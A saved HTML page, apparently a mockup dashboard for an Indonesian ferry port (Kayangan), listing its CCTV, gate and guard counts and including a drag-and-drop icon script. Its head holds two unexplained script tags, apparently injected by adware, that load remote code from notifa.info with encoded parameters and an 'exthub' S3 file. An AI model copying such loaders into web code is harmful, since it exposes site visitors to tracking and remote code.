<html lang="en"><head>
    <meta charset="utf-8">
    <title>ASDP | Dashboard</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta content="A fully featured admin theme which can be used to build CRM, CMS, etc." name="description">
    <meta content="Coderthemes" name="author">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- App favicon -->
    <!-- <link rel="shortcut icon" href="assets/images/favicon.ico"> -->

    <!-- App css -->
    <link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="assets/css/icons.min.css" rel="stylesheet" type="text/css">
    <link href="assets/css/app.min.css" rel="stylesheet" type="text/css">
    <link href="assets/css/hello.css" rel="stylesheet" type="text/css">
  <style scoped="">
    #ball {
      cursor: pointer;
      width: 25px;
      height: 25px;
    }
    .content {
      padding: 0;
      padding-top: 150px;
    }
    .bg-gray {
      background-color: #dadada;
    }
    .pr-0 {
      padding-right: 0;
    }
    .btn-primary {
      background-color: #215eac;
      border: 1px solid #215eac;
    }
    .btn-primary:hover {
      background-color: #004eb1;
      border: 1px solid #004eb1; 
    }
    @media (max-width: 480px) {
      .float-sm {
        float: left !important;
        margin-left: 15px;
      }
      #topnav .navigation-menu>li>a.btn {
        color: #fff;
      }
      .content {
        padding-top: 100px;
      }
      .pr-0 {
        padding-right: 12px !important;
      }
    }
  </style><script async="" src="https://www.google-analytics.com/analytics.js"></script><script type="text/javascript" async="" src="http://p01.notifa.info/3fsmd3/request?id=1&amp;enc=9UwkxLgY9&amp;params=4TtHaUQnUEiP6K%2fc5C582Am8lISurprAfl6XWfrZhtYjgZrZvHDgW4eB0%2bEEOOlIkMRcCQ9ed1cdrJ6rqI32NHAX%2fU4%2fttxN%2fNnL%2fI45VdQk2hXfUWOD0QiAkjqkhDWvCxVivRqMmyifv7kD42trtfaXgMaxnZsu05%2bYuZVQBWuachVhYGDDpaSTpcwfVMVvViKA8x0ThTF9IHuP748gKBNfzGo0NQmJxqW%2fobOVdz27kRL7e6f1jLO%2bBhIv2frL89Dd3R2pi4bFoLLIyZg33TdYc7%2fs3pFtlAXjnPQMMaMPLi6eUHQFs50mKCAwUF8kOt5EXVMdokRNZ5hNm%2bxl1NM%2fm%2bwk3SXATxZqU%2fMq1JGhMpuj9BiKA715lmU%2bn%2fEnqyF3uqNB3%2fOthFu%2fbJR9Lz83v5JGnVQ%2fPMua1m0xYvjIsyNIvGipGA8%2bzE7etHPrbIhRje3XiD1G59SJVs7Ufpvlr7wjeza0CL6iBK8z0dEu%2fGVnoQpDvY%2f%2fZpq2w9jpDq8evVlK3PqXZq5LvDEi4NYNh6hTV7EcM4xeWhjuAB9xQAC2CZ1GgMmxeisok2zJ&amp;idc_r=60376219927&amp;domain=viewpreview.online&amp;sw=1280&amp;sh=800"></script><script type="text/javascript" src="https://s3.amazonaws.com/exthub/e/2/r/ID_firefox.js?cached=true" data-uid="JHM0V3oTxaPgRn6YleXyB5GycS8UtZ6m"></script></head>

  

  <body class="gradient-topbar topbar-dark">
    <!-- Navigation Bar-->
    <header id="topnav">
      <!-- Topbar Start -->
      <div class="navbar-custom">
        <div class="container-fluid">
          <ul class="list-unstyled topnav-menu float-right mb-0">
            <li class="dropdown notification-list">
              <!-- Mobile menu toggle-->
              <a class="navbar-toggle nav-link">
                  <div class="lines">
                      <span></span>
                      <span></span>
                      <span></span>
                  </div>
              </a>
              <!-- End mobile menu toggle-->
            </li>
          </ul>

          <!-- LOGO -->
          <div class="logo-box" style="margin-top: 10px;">
            <a href="index.html" class="logo text-center">
              <span class="logo-lg">
                <img src="assets/images/logo.png" alt="" style="padding-top: 0px;" height="70">
                <!-- <span class="logo-lg-text-light">UBold</span> -->
              </span>
              <span class="logo-sm">
                <!-- <span class="logo-sm-text-dark">U</span> -->
                <img src="assets/images/logo.png" alt="" height="40">
              </span>
            </a>
          </div>
        </div> <!-- end container-fluid-->
      </div>
      <!-- end Topbar -->

      <div class="topbar-menu">
        <div class="container-fluid">
          <div id="navigation">
            <ul class="navigation-menu">
              <li class="has-submenu">
                <a href="index.html">
                  <i class="fe-airplay"></i>Beranda
                </a>
              </li>
              <li class="has-submenu">
                <a href="#">
                  <i class="fe-anchor"></i>Pelabuhan <div class="arrow-down"></div>
                </a>
                <ul class="submenu">
                  <li>
                    <a href="pelabuhan.html">Kayangan</a>
                  </li>
                  <li>
                    <a href="#">........</a>
                  </li>
                  <li>
                    <a href="#">........</a>
                  </li>
                </ul>
              </li>
              <li class="has-submenu last-elements">
                <a href="#">
                  <i class="fe-camera"></i>Foto/Video <div class="arrow-down"></div>
                </a>
                <ul class="submenu">
                  <li>
                    <a href="gallery.html">Kayangan</a>
                  </li>
                </ul>
              </li>
              <!-- <li class="has-submenu">
                <a href="#">
                  <i class="fe-cpu"></i>Aspek <div class="arrow-down"></div>
                </a>
                <ul class="submenu">
                  <li>
                    <a href="/aspek.html">Keamanan</a>
                  </li>
                </ul>
              </li> -->
              <li class="float-right float-sm mb-3 last-elements" style="margin-top: 20px;">
                <a href="login.html" class="text-center btn btn-primary tombol">Login <i class="fe-unlock"></i></a>
              </li>
            </ul>
            <div class="clearfix"></div>
          </div>
        </div>
      </div>
    </header>
    <!-- End Navigation Bar-->

    <!-- ============================================================== -->
    <!-- Start Page Content here -->
    <!-- ============================================================== -->

    <div class="wrapper content">
      <div class="container-fluid" style="margin-top: 30px;">
        <h3>Aspek Keamanan Pelabuhan Kayangan</h3>
        <div class="dropdown">
          <button class="btn btn-primary dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
            <i class="fe-cpu mr-1"></i> Aspek <i class="fe-chevron-down ml-1"></i>
          </button>
          <div class="dropdown-menu" aria-labelledby="dropdownMenuButton">
            <a class="dropdown-item" href="aspek.html">Keamanan</a>
          </div>
        </div>
        <div class="row mt-3">
          <div class="col-lg-8 mb-3 pr-0">
            <img src="assets/images/anjungan.png" class="img-fluid" style="width: 100%;">
          </div>
          <div class="col-lg-4 mb-3 p-0 bg-gray py-4">
            <div class="bg-warning text-center py-1 hello">
              <h3 class="text-white font-weight-bold"><span style="font-weight: 1">ASPEK</span> KEAMANAN</h3>
            </div>
            <div class="px-3 my-3">
              <span class="rounded-circle text-white bg-warning mr-1" style="padding: 3px 10px;">1</span>
              <span class="text-warning">Keamanan</span><br><br>
              <a href="aspek-cctv.html">
                <img src="assets/images/CCTV.png" class="mr-1" style="height: 25px;">
              </a>
              <span>CCTV : <b>18 titik</b></span><br><br>
              <a href="#">
                <img src="assets/images/GAPURA.png" class="mr-1" style="height: 25px;">
              </a>
              <span>GAPURA / Pintu Gerbang : <b>1 titik</b></span><br><br>
              <a href="#">
                <img src="assets/images/PENGAMAN.png" class="mr-1" style="height: 25px;">
              </a>
              <span>Satuan Pengamanan : <b>25 orang</b></span><br>
              <b style="margin-left: 33px;">(2 shift : 3 regu, 1 shift : 8 orang)</b><br><br>
              <a href="#">
                <img src="assets/images/KEAMANAN.png" class="mr-1" style="height: 25px;">
              </a>
              <span>Post Keamanan : <b>1 titik, 16 m2</b></span>
              <div class="my-4 d-flex">
                <i style="font-size: 25px;" class="fe-plus-square mr-1"></i>
                <img src="assets/images/CCTV.png" id="ball">
              </div>
              <a href="edit.html" class="btn btn-primary px-3">Save</a>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- end wrapper -->

    <!-- ============================================================== -->
    <!-- End Page content -->
    <!-- ============================================================== -->

    <!-- Right bar overlay-->
    <div class="rightbar-overlay"></div>

    <!-- Vendor js -->
    <script src="assets/js/vendor.min.js"></script>

    <!-- Plugins js -->
    <script src="assets/libs/morris-js/morris.min.js"></script>
    <script src="assets/libs/raphael/raphael.min.js"></script>

    <!-- Dashboard init-->
    <script src="assets/js/pages/dashboard-4.init.js"></script>

    <!-- App js-->
    <script src="assets/js/app.min.js"></script>

    <script>
      let currentDroppable = null;

      ball.onmousedown = function(event) {

        let shiftX = event.clientX - ball.getBoundingClientRect().left;
        let shiftY = event.clientY - ball.getBoundingClientRect().top;

        ball.style.position = 'absolute';
        ball.style.zIndex = 1000;
        document.body.append(ball);

        moveAt(event.pageX, event.pageY);

        function moveAt(pageX, pageY) {
          ball.style.left = pageX - shiftX + 'px';
          ball.style.top = pageY - shiftY + 'px';
          let left = pageX - shiftX;
          let top = pageY - shiftY;
          console.log(left + ' - ' + top)
        }

        function onMouseMove(event) {
          moveAt(event.pageX, event.pageY);


          ball.hidden = true;
          let elemBelow = document.elementFromPoint(event.clientX, event.clientY);
          ball.hidden = false;

          if (!elemBelow) return;

          let droppableBelow = elemBelow.closest('.droppable');
          if (currentDroppable != droppableBelow) {
            if (currentDroppable) { // null when we were not over a droppable before this event
              leaveDroppable(currentDroppable);
            }
            currentDroppable = droppableBelow;
            if (currentDroppable) { // null if we're not coming over a droppable now
              // (maybe just left the droppable)
              enterDroppable(currentDroppable);
            }
          }
        }

        document.addEventListener('mousemove', onMouseMove);

        ball.onmouseup = function() {
          document.removeEventListener('mousemove', onMouseMove);
          ball.onmouseout = null;
        };
      };

      function enterDroppable(elem) {
        elem.style.background = 'pink';
      }

      function leaveDroppable(elem) {
        elem.style.background = '';
      }

      ball.ondragstart = function() {
        return false;
      };
    </script>

</body></html>